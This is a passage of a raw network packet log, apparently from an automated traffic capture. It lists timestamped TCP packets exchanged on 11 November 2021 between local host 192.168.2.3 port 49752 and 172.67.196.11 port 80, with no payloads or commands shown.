                                                                                                                          Nov 11, 2021 01:57:46.540164948 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540185928 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540189028 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540209055 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540234089 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540241003 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540256023 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540276051 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540281057 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540302038 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540326118 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540330887 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540348053 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540369987 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540373087 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540391922 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540416002 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540416956 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540436983 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540460110 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540460110 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540487051 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540505886 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540509939 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540530920 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540555954 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540561914 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540575981 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540600061 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540600061 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540622950 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540643930 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540644884 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540669918 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540694952 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540695906 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540715933 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540740967 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540760040 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540760994 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540781021 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540785074 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540806055 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540828943 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540829897 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540864944 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540874004 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540894032 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540913105 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540936947 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540939093 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.540960073 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540982962 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.540982962 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541003942 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541028023 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541032076 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541048050 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541074991 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541083097 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541095972 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541121006 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541122913 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541141987 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541163921 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541177988 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541187048 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541210890 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541213036 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541232109 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541255951 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541259050 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541275978 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541301012 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541301012 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541321039 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541343927 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541344881 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541364908 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541387081 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541388988 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541409016 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541433096 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541450977 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541452885 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541471004 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541476011 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541496992 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541520119 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541520119 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541541100 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541567087 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541574955 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541588068 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541611910 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541625023 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541632891 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541655064 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541656017 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541671991 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541687012 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541702032 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541718960 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541733980 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541748047 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541764021 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541784048 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541799068 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541802883 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541825056 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541842937 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541846991 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541872025 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541881084 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541892052 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541914940 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541917086 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541937113 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541960955 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.541963100 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.541980028 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542001963 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542006969 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542027950 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542051077 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542052031 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542072058 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542093039 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542094946 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542115927 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542138100 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542160988 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542186022 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542198896 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542210102 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542221069 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542237043 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542237997 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542257071 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542280912 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542284966 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542300940 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542325974 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542327881 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542346954 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542370081 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542368889 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542390108 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542411089 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542418957 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542438030 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542462111 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542469978 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542484045 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542507887 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542531013 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542546034 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542555094 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542556047 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542577028 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542602062 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542603016 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542623043 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542644024 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542665958 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542680979 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542692900 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542692900 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542712927 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542737961 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542740107 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542762995 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542783022 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542789936 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542810917 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542826891 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542844057 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542850971 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542875051 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542876959 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542897940 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542920113 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542939901 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542944908 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542962074 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.542963028 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.542984009 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543008089 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543011904 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543028116 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543051004 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543051958 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543072939 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543096066 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543101072 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543117046 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543138027 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543139935 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543160915 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543181896 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543206930 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543215036 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543227911 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543232918 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543253899 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543277025 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543279886 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543296099 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543319941 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543325901 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543339968 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543360949 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543376923 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543381929 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543407917 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543411016 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543427944 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543448925 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543451071 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543472052 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543494940 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543493986 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543514967 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543539047 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543540001 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543559074 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543581009 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543581963 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543601990 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543625116 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543626070 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543644905 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543665886 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543668985 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543688059 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543705940 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543711901 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543731928 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543762922 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543764114 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543785095 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543802977 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543808937 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543829918 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543853045 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543853998 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543874025 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543898106 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543899059 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543919086 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543941975 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543942928 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.543965101 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543988943 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.543992996 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544008970 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544034004 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544051886 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544054985 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544065952 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544079065 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544099092 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544120073 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544138908 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544142008 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544166088 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544176102 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544187069 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544207096 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544210911 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544230938 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544254065 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544255018 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544275045 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544298887 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544306040 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544322014 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544341087 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544344902 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544365883 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544385910 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544388056 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544408083 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544430971 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544435978 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544451952 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544470072 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544473886 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544495106 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544516087 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544517040 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544537067 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544558048 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544559956 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544579983 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544600010 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544603109 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544624090 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544646025 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544646978 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544667959 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544688940 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544692039 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544712067 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544734955 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544735909 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544755936 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544779062 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544780970 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544797897 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544822931 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544828892 CET4975280192.168.2.3172.67.196.11
